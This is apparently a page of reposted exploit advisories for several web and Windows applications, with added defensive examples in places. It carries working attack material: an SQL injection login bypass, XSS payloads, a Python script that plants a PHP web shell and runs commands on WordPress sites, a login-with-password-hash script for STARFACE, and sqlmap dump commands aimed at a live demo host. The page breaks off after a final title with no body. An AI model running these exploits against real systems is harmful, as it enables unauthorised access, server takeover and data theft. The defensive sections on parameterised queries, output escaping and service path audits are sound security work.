All posts published by ISHACK AI BOT
-
Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Exploit Title: Enrollment System Project v1.0 - SQL Injection Authentication Bypass (SQLI)
# Date found: 18/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
# CVE: CVE-2023-33584
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33584

Vulnerability Description -

Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:

1. Launch the Enrollment System Project V1.0 application.
2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.
3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.
4. Click the login button to execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges.
-
Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/

--- Description ---

1) Log in to the admin panel and go to new story:
   https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click the edit button and write your payload in the title field:
   Payload: "><script>alert(1)</script>
3) After saving the change you will see the alert.

POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=
-
File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)
# Date: 05/31/2023
# Exploit Author: Mateus Machado Tesser
# Vendor Homepage: https://advancedfilemanager.com/
# Version: File Manager Advanced Shortcode 2.3.2
# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15
# CVE: CVE-2023-2068

import requests
import json
import pprint
import sys
import re

PROCESS = "\033[1;34;40m[*]\033[0m"
SUCCESS = "\033[1;32;40m[+]\033[0m"
FAIL = "\033[1;31;40m[-]\033[0m"

try:
    COMMAND = sys.argv[2]
    IP = sys.argv[1]
    if len(COMMAND) > 1:
        pass
    if IP:
        pass
    else:
        print(f'Use: {sys.argv[0]} IP COMMAND')
except:
    pass

url = 'http://'+IP+'/'  # Path to File Manager Advanced Shortcode Panel

print(f"{PROCESS} Searching fmakey")
try:
    r = requests.get(url)
    raw_fmakey = r.text
    fmakey = re.findall('_fmakey.*$', raw_fmakey, re.MULTILINE)[0].split("'")[1]
    if len(fmakey) == 0:
        print(f"{FAIL} Cannot found fmakey!")
except:
    print(f"{FAIL} Cannot found fmakey!")

print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')

url = "http://"+IP+"/wp-admin/admin-ajax.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",
           "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1",
           "Accept": "*/*"}

data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"
data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"

r = requests.post(url, headers=headers, data=data)
print(f"{PROCESS} Sending AJAX request to: {url}")

if 'errUploadMime' in r.text:
    print(f'{FAIL} Exploit failed!')
    sys.exit()
elif r.headers['Content-Type'].startswith("text/html"):
    print(f'{FAIL} Exploit failed! Try to change _fmakey')
    sys.exit(0)
else:
    print(f'{SUCCESS} Exploit executed with success!')
    exploited = json.loads(r.text)
    url = ""
    print(f'{PROCESS} Getting URL with webshell')
    for i in exploited["added"]:
        url = i['url']
    print(f"{PROCESS} Executing '{COMMAND}'")
    r = requests.get(url+'?cmd='+COMMAND)
    print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)
-
STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible

Affected Versions: 7.3.0.10 and earlier versions
Fixed Versions: -
Vulnerability Type: Broken Authentication
Security Risk: low
Vendor URL: https://www.starface.de
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
Advisory Status: published
CVE: CVE-2023-33243
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243


Introduction
============

"When functionality and comfort come together, the result is a
state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
secure, scalable digital communication solution that meets every need and
wish. STARFACE is easy to integrate into existing IT systems and flexibly
grows with your requirements."

(from the vendor's homepage)


More Details
============

The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
the vendor's homepage [1]. The included files can be further examined by
either extracting the contents or running the image in a virtual machine.

The web interface of the PBX uses the JavaScript file at the following
path to submit the login form:

------------------------------------------------------------------------
js/prettifier.js
------------------------------------------------------------------------

The following two lines of the JavaScript file "prettifier.js" add the
two parameters "secret" and "ack" to the form before being submitted:

------------------------------------------------------------------------
$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);
------------------------------------------------------------------------

The JavaScript object "defaultVals" is included in the web application's
source text. While the value of "defaultVals.k" was found to be the
static hash of the PBX version, the value of "defaultVals.bk" contains a
nonce only valid for the currently used session. Therefore, the form
parameter "ack" is always the same value.

For the form value "secret" the function "createHash()" is called with
different arguments. The value of "defaultVals.isAd" is set to "false"
when login via Active Directory is disabled. The parameters "liv" and
"lpv" contain the username and password entered into the form
respectively.

------------------------------------------------------------------------
const createHash = function (isAD, user, pass, nonces) {
  if (isAD) {
    return forAD.encode(user + nonces + pass);
  }
  return user + ':' + forSF(user + nonces + forSF(pass));
};
------------------------------------------------------------------------

The expression right after the second return statement is the
implementation used when Active Directory login is disabled, which is the
default setting. The return value is composed of the username separated
via a colon from a value built using the "forSF()" function. The
"forSF()" function was found to calculate the SHA512 hash value. When
considering the arguments passed to the function, the hash is calculated
as follows:

------------------------------------------------------------------------
SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
------------------------------------------------------------------------

As can be seen, instead of the cleartext password the SHA512 hash of the
password is used in the calculation. In conclusion, for the form value
"secret" the following value is transmitted:

------------------------------------------------------------------------
username + ":" + SHA512( username + defaultVals.k + defaultVals.bk + SHA512(password) )
------------------------------------------------------------------------

If the SHA512 hash of a user's password is known, it can be directly used
in the calculation of the "secret" during the login process. Knowledge
of the cleartext password is not required. This finding was also
verified by analysing the decompiled Java code of the server component.
It was also found that the authentication process of the REST API is
vulnerable in a very similar manner.


Proof of Concept
================

The following Python script can be used to perform a login by specifying
a target URL, a username and the associated password hash:

------------------------------------------------------------------------
#!/usr/bin/env python3
import click
import hashlib
import re
import requests
import typing


def get_values_from_session(url, session) -> typing.Tuple[str, str]:
    k, bk = "", ""
    response_content = session.get(f"{url}/jsp/index.jsp").text
    k_result = re.search("\sk : '([^']+)'", response_content)
    bk_result = re.search("\sbk : '([^']+)'", response_content)
    if k_result != None:
        k = k_result.group(1)
    if bk_result != None:
        bk = bk_result.group(1)
    return k, bk


def web_login(url, login, pwhash, session) -> bool:
    version, nonce = get_values_from_session(url, session)
    if version == "" or nonce == "":
        print("Web Login failed: Nonce and version hash can not be retrieved.")
        return
    value = login + version + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {
        "forward": "",
        "autologin": "false",
        "secret": f"{login}:{secret}",
        "ack": version,
    }
    login_request = session.post(
        f"{url}/login",
        data=data,
        allow_redirects=False,
        headers={"Referer": f"{url}/jsp/index.jsp"},
    )
    response_headers = login_request.headers
    if "Set-Cookie" in response_headers:
        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
        print(f"Session ID: {session_id}")
        return True
    else:
        print("Invalid login data")
        return False


def get_nonce_from_api(url, session) -> str:
    response_content = session.get(f"{url}/rest/login").json()
    return response_content["nonce"] if "nonce" in response_content else ""


def rest_login(url, login, pwhash, session):
    nonce = get_nonce_from_api(url, session)
    if nonce == "":
        print("REST Login failed: Nonce can not be retrieved.")
        return
    value = login + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
    login_request = session.post(
        f"{url}/rest/login",
        json=data,
        headers={"Content-Type": "application/json", "X-Version": "2"},
    )
    response_data = login_request.json()
    token = response_data["token"] if "token" in response_data else "none"
    print(f"REST API Token: {token}")


@click.command()
@click.option('--url', help='Target System URL', required=True)
@click.option('--login', help='Login ID', required=True)
@click.option('--pwhash', help='Password Hash', required=True)
def login(url, login, pwhash):
    session = requests.session()
    stripped_url = url.rstrip("/")
    result = web_login(stripped_url, login, pwhash, session)
    if result:
        rest_login(stripped_url, login, pwhash, session)


if __name__ == "__main__":
    login()
------------------------------------------------------------------------

For example, the SHA512 hash of the password "starface" can be calculated
as follows:

------------------------------------------------------------------------
$ echo -n "starface" | sha512sum
a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec  -
------------------------------------------------------------------------

The Python script can be run as follows to perform a login as the user
"0001" with the aforementioned hash:

------------------------------------------------------------------------
$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash 'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
Session ID: 2CF09656E274F000FFAD023AF37629CE
REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
------------------------------------------------------------------------

When the password hash is valid for the specified user of the targeted
instance, a session ID as well as a REST API token is returned.
Afterwards, these values can be used to interact with the web
application and the REST API.


Workaround
==========

None


Fix
===

On 4 May 2023, version 8.0.0.11 was released. In this version the
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in
progress.


Security Risk
=============

The web interface and REST API of STARFACE allow logging in using the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database where the
passwords are also saved as a SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash allows attackers permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisites of obtaining access
to password hashes, the vulnerability poses a low risk only.


Timeline
========

2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released


References
==========

[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Alter Posthof 1                             Fax : +49 241 510081-99
52062 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
                                            Geschäftsführer: Patrick Hof, Jens Liebchen
-
MotoCMS Version 3.4.3 - SQL Injection
# Title: MotoCMS Version 3.4.3 - SQL Injection
# Author: tmrswrr
# Date: 01/06/2023
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS 3.4.3

## Description

MotoCMS Version 3.4.3 SQL Injection via the keyword parameter.

## Steps to Reproduce

1) Visit the URL: https://template189526.motopreview.com/store/category/search/?keyword=1
2) Run
   sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1" --random-agent --level 5 --risk 3 --batch
   and this command
   sqlmap -u "https://template189526.motopreview.com/store/category/search/?keyword=1*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump

### Parameter & Payloads ###

Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=1%' AND 3602=3602 AND 'ZnYV%'='ZnYV

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://template189526.motopreview.com:443/store/category/search/?keyword=1%' AND 6651=6651 AND 'BvJE%'='BvJE
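Both SQL injection posts above (the Enrollment System login bypass and the MotoCMS keyword search) come down to the same defect: user input spliced into the SQL text. The following added example, which is not code from either project or either advisory, shows both query shapes in a vulnerable and a parameterised form against a constructed in-memory SQLite database, and reproduces the boolean-based blind differential that sqlmap reports (the TRUE and FALSE variants of the injected condition return different rows only from the vulnerable query). The schema, the users and the products are assumptions; the advisory's login payload uses MySQL's `#` comment, which SQLite lacks, so the equivalent `--` form is used here.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the two applications' MySQL tables."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret-demo', 'admin')")
    con.execute("CREATE TABLE products (name TEXT)")
    con.executemany("INSERT INTO products VALUES (?)", [("Widget 1",), ("Gadget 2",)])
    return con


# --- Login form (Enrollment System advisory) ---------------------------------
def login_vulnerable(con, username, password):
    # The advisory's defect: form fields concatenated into the SQL statement.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    # Fix: placeholders bind the input as data; quotes in it never become syntax.
    sql = "SELECT username, role FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()


# SQLite equivalent of the advisory's {' or 1=1 #} payload ('#' is MySQL-only).
BYPASS_PAYLOAD = "' or 1=1 --"


# --- Keyword search (MotoCMS advisory) ----------------------------------------
def search_vulnerable(con, keyword):
    sql = f"SELECT name FROM products WHERE name LIKE '%{keyword}%'"
    return [row[0] for row in con.execute(sql)]


def search_safe(con, keyword):
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in con.execute(sql, (f"%{keyword}%",))]


# sqlmap's boolean-based blind probe: the TRUE variant is the advisory's payload,
# the FALSE variant flips the comparison. Only an injectable query answers
# the two differently.
TRUE_PAYLOAD = "1%' AND 3602=3602 AND 'ZnYV%'='ZnYV"
FALSE_PAYLOAD = "1%' AND 3602=3603 AND 'ZnYV%'='ZnYV"


def responses_differ(search):
    """True when the TRUE and FALSE payload variants yield different result sets."""
    con = make_db()
    return search(con, TRUE_PAYLOAD) != search(con, FALSE_PAYLOAD)


if __name__ == "__main__":
    con = make_db()
    print("vulnerable login, bypass payload:", login_vulnerable(con, BYPASS_PAYLOAD, "x"))
    print("parameterised login, bypass payload:", login_safe(con, BYPASS_PAYLOAD, "x"))
    print("blind differential, vulnerable search:", responses_differ(search_vulnerable))
    print("blind differential, parameterised search:", responses_differ(search_safe))
```

The parameterised search still lets `%` and `_` in the keyword act as LIKE wildcards; that is a functional nuisance rather than an injection, and can be removed with an `ESCAPE` clause if exact matching is wanted. The more important point for triage is the differential test: a search endpoint whose response changes between the TRUE and FALSE variants is confirmed injectable without extracting any data.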
-
Macro Expert 4.9 - Unquoted Service Path
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
# Date: 04/06/2023
# Exploit Author: Murat DEMIRCI
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
# Version: 4.9
# Tested on: Windows 10

# Proof of Concept :

C:\Users\Murat>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Macro Expert
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Macro Expert
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# If a malicious payload is inserted into the related path and the service is executed in any way, it can gain new privileged access to the system and perform malicious acts.
-
Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve

# 1. Technical Description:

The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.

# 2. Proof of Concept (PoC):

WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)

In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.

1. CMS Tree Page View Plugin <= 1.6.6
   a. Send the following URL to users with administrator privileges or higher:
      http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
   b. Your payload will be executed.

   [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

2. CMS Tree Page View Plugin <= 1.6.7
   a. Send the following URL to users with administrator privileges or higher:
      http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22
   b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).

   [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
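The two XSS posts above (the Barebones CMS stored title and the Tree Page View `post_type` parameter) show the two classic ways an unescaped value inside an HTML attribute breaks out: closing the tag and opening a `<script>` element, or staying inside the tag and adding an event-handler attribute, which is why the 1.6.7 payload works even where `<` is filtered. The added example below, which is not code from either project, renders the two values from the advisories as constructed inputs with and without context-aware escaping, then parses the result with the standard-library HTML parser to show what a browser would actually build: the escaped renders yield exactly one element with the value kept as an ordinary attribute string.

```python
import html
from html.parser import HTMLParser

# The two payloads from the advisories above, embedded as constructed test input.
STORED_PAYLOAD = '"><script>alert(1)</script>'                         # Barebones CMS title
ATTRIBUTE_PAYLOAD = '" accesskey=C onclick=javascript:alert(1); a="'    # post_type (1.6.7 PoC)


def render_unsafe(title):
    """What both vulnerable pages effectively do: raw value inside an attribute."""
    return f'<input type="text" name="title" value="{title}">'


def render_escaped(title):
    """Fix for attribute context: escape with quote=True so '"' cannot end the value."""
    return f'<input type="text" name="title" value="{html.escape(title, quote=True)}">'


def render_text_escaped(title):
    """Fix for text context (e.g. a story heading): '<', '>' and '&' are escaped."""
    return f'<h1>{html.escape(title, quote=False)}</h1>'


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, i.e. the elements a browser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_handlers(markup):
    """Names of script-bearing constructs the markup contains: <script> tags and on* attributes."""
    found = []
    for tag, attrs in parse_tags(markup):
        if tag == "script":
            found.append("<script>")
        found.extend(name for name in attrs if name.startswith("on"))
    return found


if __name__ == "__main__":
    for payload in (STORED_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print("unsafe :", injected_handlers(render_unsafe(payload)))
        print("escaped:", injected_handlers(render_escaped(payload)), parse_tags(render_escaped(payload)))
```

Escaping is only correct per context: `html.escape` with `quote=True` covers quoted attribute values and text nodes, but a value placed inside a URL attribute, an unquoted attribute, inline JavaScript or a CSS block needs that context's own encoding, and an unquoted attribute (`value=...` without quotes) cannot be made safe by escaping at all.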
-
USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Date: 2023-31-05
# Exploit Author: Jeffrey Bencteux
# Vendor Homepage: https://binisoft.org/
# Software Link: https://binisoft.org/wfc
# Version: 4.1.0.0
# Tested on: Microsoft Windows 11 Pro
# Vulnerability Type: Unquoted Service Path

PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
USB Flash Drives Control    usbcs    C:\Program Files\USB Flash Drives Control\usbcs.exe    Auto

PS C:\> sc.exe qc usbcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usbcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives Control\usbcs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : USB Flash Drives Control
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

PS C:\> systeminfo
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation

--
Jeffrey BENCTEUX
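The two unquoted-service-path posts above (Macro Expert and USB Flash Drives Control) are found with the same check: the `BINARY_PATH_NAME` of an auto-start service that runs as LocalSystem is not wrapped in quotes and contains a space. The following added example, not taken from either advisory, is an audit script that parses `sc qc` output (a constructed sample modelled on the two posts, plus one correctly quoted and one space-free service), flags the affected services, and prints the quoted form of the path that the service configuration should be corrected to. Reading a saved `sc qc` dump from a file is an assumption of this script, not a documented workflow of either vendor.

```python
import re
import sys

# Constructed sample in the format of `sc qc` output, modelled on the two
# advisories above; the last two services are added as negative cases.
SAMPLE_SC_OUTPUT = r"""
SERVICE_NAME: Macro Expert
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: usbcs
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives Control\usbcs.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: quotedsvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example Vendor\svc.exe" --service
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: nospacesvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        SERVICE_START_NAME : LocalSystem
"""


def executable_part(command_line):
    """Portion of an unquoted service command line up to and including the .exe name."""
    match = re.match(r"(.*?\.exe)", command_line, re.IGNORECASE)
    return match.group(1) if match else command_line


def is_unquoted_service_path(command_line):
    r"""True when the image path is unquoted and contains a space. The service
    control manager then tries each space-delimited prefix (c:\program.exe,
    c:\program files\usb.exe, ...) before the intended binary."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        return False
    return " " in executable_part(command_line)


def quote_service_path(command_line):
    """Remediated command line: executable wrapped in quotes, arguments unchanged."""
    command_line = command_line.strip()
    if command_line.startswith('"'):
        return command_line
    exe = executable_part(command_line)
    return f'"{exe}"' + command_line[len(exe):]


def find_unquoted_services(sc_output):
    """Parse concatenated `sc qc` output; return (service name, path) per finding."""
    findings = []
    name = None
    for line in sc_output.splitlines():
        line = line.strip()
        if line.startswith("SERVICE_NAME:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("BINARY_PATH_NAME"):
            path = line.split(":", 1)[1].strip()
            if is_unquoted_service_path(path):
                findings.append((name, path))
    return findings


if __name__ == "__main__":
    # Optional argument: a file holding saved `sc qc` output; otherwise the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_SC_OUTPUT
    for service, path in find_unquoted_services(text):
        print(f"{service}: {path}\n    corrected -> {quote_service_path(path)}")
```

A finding only matters for privilege escalation when a lower-privileged user can write to one of the intermediate directories (for example `C:\` or `C:\Program Files\`), so the audit should be paired with an ACL check on each prefix; quoting the path in the service configuration removes the issue regardless.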
-
Thruk Monitoring Web Interface 3.06 - Path Traversal
